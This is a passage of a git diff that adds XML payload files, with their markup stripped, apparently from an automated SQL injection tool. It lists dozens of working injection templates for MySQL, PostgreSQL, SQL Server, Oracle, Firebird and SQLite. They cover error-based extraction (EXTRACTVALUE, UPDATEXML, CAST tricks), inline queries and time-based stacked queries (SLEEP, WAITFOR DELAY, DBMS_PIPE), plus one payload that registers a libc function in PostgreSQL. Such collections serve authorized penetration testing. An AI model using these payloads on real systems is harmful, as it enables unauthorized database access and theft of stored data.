+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ Oracle
+
+
+
+
+ Firebird AND error-based - WHERE or HAVING clause
+ 2
+ 2
+ 0
+ 1
+ 1
+ AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
+
+ AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ Firebird
+
+
+
+
+ MySQL >= 5.0 OR error-based - WHERE or HAVING clause
+ 2
+ 2
+ 2
+ 1
+ 2
+ OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
+
+ OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MySQL
+ >= 5.0
+
+
+
+
+ MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)
+ 2
+ 3
+ 2
+ 1
+ 1
+ OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
+
+ OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MySQL
+ >= 5.1
+
+
+
+
+ MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)
+ 2
+ 4
+ 2
+ 1
+ 1
+ OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])
+
+ OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MySQL
+ >= 5.1
+
+
+
+
+ MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)
+ 2
+ 5
+ 2
+ 1
+ 1
+ OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
+
+ OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MySQL
+ >= 5.5
+
+
+
+
+ MySQL >= 4.1 OR error-based - WHERE or HAVING clause
+ 2
+ 2
+ 2
+ 1
+ 2
+ OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)
+
+ OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MySQL
+ >= 4.1
+
+
+
+
+ MySQL OR error-based - WHERE or HAVING clause
+ 2
+ 3
+ 2
+ 1
+ 2
+ OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)
+
+ OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)
+ #
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MySQL
+
+
+
+
+ PostgreSQL OR error-based - WHERE or HAVING clause
+ 2
+ 2
+ 2
+ 1
+ 2
+ OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)
+
+ OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ PostgreSQL
+
+
+
+
+ Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
+ 2
+ 2
+ 2
+ 1
+ 2
+ OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
+
+ OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)
+ 2
+ 3
+ 2
+ 1
+ 2
+ OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
+
+ OR [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Oracle OR error-based - WHERE or HAVING clause (XMLType)
+ 2
+ 2
+ 2
+ 1
+ 2
+ OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+
+ OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ Oracle
+
+
+
+
+ Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
+ 2
+ 3
+ 2
+ 1
+ 2
+ OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
+
+ OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ Oracle
+ >= 8.1.6
+
+
+
+
+ Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
+ 2
+ 4
+ 2
+ 1
+ 2
+ OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
+
+ OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ Oracle
+
+
+
+
+ Firebird OR error-based - WHERE or HAVING clause
+ 2
+ 3
+ 2
+ 1
+ 2
+ OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
+
+ OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ Firebird
+
+
+
+
+
+
+
+ MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
+ 2
+ 2
+ 0
+ 1,2,3,4,5
+ 1
+ PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')),1)
+
+ PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')),1)
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MySQL
+ >= 5.1
+
+
+
+
+
+
+ MySQL >= 5.0 error-based - Parameter replace
+ 2
+ 3
+ 0
+ 1,2,3
+ 3
+ (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
+
+ (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MySQL
+ >= 5.0
+
+
+
+
+ MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)
+ 2
+ 3
+ 0
+ 1,2,3
+ 3
+ (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))
+
+ (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')))
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MySQL
+ >= 5.1
+
+
+
+
+ MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
+ 2
+ 4
+ 0
+ 1,2,3
+ 3
+ (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))
+
+ (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]))
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MySQL
+ >= 5.1
+
+
+
+
+ MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)
+ 2
+ 5
+ 0
+ 1,2,3
+ 3
+ (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
+
+ (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MySQL
+ >= 5.5
+
+
+
+
+ PostgreSQL error-based - Parameter replace
+ 2
+ 3
+ 0
+ 1,2,3
+ 3
+ (CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))
+
+ (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ PostgreSQL
+
+
+
+
+ Microsoft SQL Server/Sybase error-based - Parameter replace
+ 2
+ 3
+ 0
+ 1,3
+ 3
+ (CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))
+
+ (CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)
+ 2
+ 4
+ 0
+ 1,3
+ 3
+ (SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')
+
+ (SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Oracle error-based - Parameter replace
+ 2
+ 3
+ 0
+ 1,3
+ 3
+ (SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+
+ (SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ Oracle
+
+
+
+
+ Firebird error-based - Parameter replace
+ 2
+ 4
+ 0
+ 1,3
+ 3
+ (SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))
+
+ (SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ Firebird
+
+
+
+
+
+
+
+ MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses
+ 2
+ 3
+ 0
+ 2,3
+ 1
+ ,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
+
+ ,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MySQL
+ >= 5.0
+
+
+
+
+ MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)
+ 2
+ 3
+ 0
+ 2,3
+ 1
+ ,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
+
+ ,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MySQL
+ >= 5.1
+
+
+
+
+ MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)
+ 2
+ 4
+ 0
+ 2,3
+ 1
+ ,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])
+
+ ,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MySQL
+ >= 5.1
+
+
+
+
+ MySQL >= 5.5 error-based - GROUP BY and ORDER BY clauses (BIGINT UNSIGNED)
+ 2
+ 5
+ 0
+ 2,3
+ 1
+ ,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
+
+ ,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MySQL
+ >= 5.5
+
+
+
+
+ PostgreSQL error-based - GROUP BY and ORDER BY clauses
+ 2
+ 3
+ 0
+ 2,3
+ 1
+ ,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))
+
+ ,(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ PostgreSQL
+
+
+
+
+ Microsoft SQL Server/Sybase error-based - ORDER BY clause
+ 2
+ 3
+ 0
+ 3
+ 1
+ ,(CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))
+
+ ,(CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Oracle error-based - GROUP BY and ORDER BY clauses
+ 2
+ 3
+ 0
+ 2,3
+ 1
+ ,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+
+ ,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ Oracle
+
+
+
+
+
diff --git a/xml/payloads/03_inline_query.xml b/xml/payloads/03_inline_query.xml
new file mode 100644
index 000000000..595ff3dab
--- /dev/null
+++ b/xml/payloads/03_inline_query.xml
@@ -0,0 +1,120 @@
+
+
+
+
+
+ MySQL inline queries
+ 6
+ 1
+ 1
+ 1,2,3,8
+ 3
+ (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
+
+ (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MySQL
+
+
+
+
+ PostgreSQL inline queries
+ 6
+ 1
+ 1
+ 1,2,3,8
+ 3
+ (SELECT '[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]')
+
+ (SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]')
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ PostgreSQL
+
+
+
+
+ Microsoft SQL Server/Sybase inline queries
+ 6
+ 1
+ 1
+ 1,2,3,8
+ 3
+ (SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')
+
+ (SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Oracle inline queries
+ 6
+ 1
+ 1
+ 1,2,3,8
+ 3
+ (SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL)
+
+ (SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]' FROM DUAL)
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ Oracle
+
+
+
+
+ SQLite inline queries
+ 6
+ 1
+ 1
+ 1,2,3,8
+ 3
+ SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'
+
+ SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))||'[DELIMITER_STOP]'
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ SQLite
+
+
+
+ Firebird inline queries
+ 6
+ 2
+ 1
+ 1,2,3,8
+ 3
+ SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' FROM RDB$DATABASE
+
+ SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ Firebird
+
+
+
+
diff --git a/xml/payloads/04_stacked_queries.xml b/xml/payloads/04_stacked_queries.xml
new file mode 100644
index 000000000..8eb334738
--- /dev/null
+++ b/xml/payloads/04_stacked_queries.xml
@@ -0,0 +1,337 @@
+
+
+
+
+
+ MySQL > 5.0.11 stacked queries (SELECT)
+ 4
+ 2
+ 0
+ 0
+ 1
+ ; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+ ; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
+
+
+
+
+
+ MySQL
+ > 5.0.11
+
+
+
+
+ MySQL > 5.0.11 stacked queries (SELECT - comment)
+ 4
+ 4
+ 0
+ 0
+ 1
+ ; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+ ; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
+ #
+
+
+
+
+
+ MySQL
+ > 5.0.11
+
+
+
+
+ MySQL > 5.0.11 stacked queries
+ 4
+ 1
+ 0
+ 0
+ 1
+ ; SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
+
+ ; SELECT SLEEP([SLEEPTIME])
+ --
+
+
+
+
+
+ MySQL
+ > 5.0.11
+
+
+
+
+ MySQL < 5.0.12 stacked queries (heavy query)
+ 4
+ 2
+ 2
+ 0
+ 1
+ ; SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
+
+ ; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))
+ --
+
+
+
+
+
+ MySQL
+
+
+
+
+ PostgreSQL > 8.1 stacked queries
+ 4
+ 1
+ 0
+ 0
+ 1
+ ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
+
+ ; SELECT PG_SLEEP([SLEEPTIME])
+ --
+
+
+
+
+
+ PostgreSQL
+ > 8.1
+
+
+
+
+ PostgreSQL stacked queries (heavy query)
+ 4
+ 2
+ 2
+ 0
+ 1
+ ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)
+
+ ; SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)
+ --
+
+
+
+
+
+ PostgreSQL
+
+
+
+
+ PostgreSQL < 8.2 stacked queries (Glibc)
+ 4
+ 4
+ 0
+ 0
+ 1
+ ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
+
+ ; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])
+ --
+
+
+
+
+
+ PostgreSQL
+ < 8.2
+ Linux
+
+
+
+
+ Microsoft SQL Server/Sybase stacked queries
+ 4
+ 1
+ 0
+ 0
+ 1
+ ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'
+
+ ; WAITFOR DELAY '0:0:[SLEEPTIME]'
+ --
+
+
+
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)
+ 4
+ 5
+ 0
+ 0
+ 1
+ ; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL
+
+ ; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL
+ --
+
+
+
+
+
+ Oracle
+
+
+
+
+ Oracle stacked queries (heavy query)
+ 4
+ 5
+ 2
+ 0
+ 1
+ ; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL
+
+ ; SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5
+ --
+
+
+
+
+
+ Oracle
+
+
+
+
+ Oracle stacked queries (DBMS_LOCK.SLEEP)
+ 4
+ 5
+ 0
+ 0
+ 1
+ ; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END
+
+ ; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END
+ --
+
+
+
+
+
+ Oracle
+
+
+
+
+ Oracle stacked queries (USER_LOCK.SLEEP)
+ 4
+ 5
+ 0
+ 0
+ 1
+ ; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END
+
+ ; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END
+ --
+
+
+
+
+
+ Oracle
+
+
+
+
+ SQLite > 2.0 stacked queries (heavy query)
+ 4
+ 3
+ 2
+ 0
+ 1
+ ; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)
+
+ ; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
+ --
+
+
+
+
+
+ SQLite
+ > 2.0
+
+
+
+
+ Firebird stacked queries (heavy query)
+ 4
+ 3
+ 2
+ 0
+ 1
+ ; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE
+
+ ; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4
+ --
+
+
+
+
+
+ Firebird
+ >= 2.0
+
+
+
+
+ HSQLDB >= 1.7.2 stacked queries
+ 4
+ 3
+ 0
+ 0
+ 1
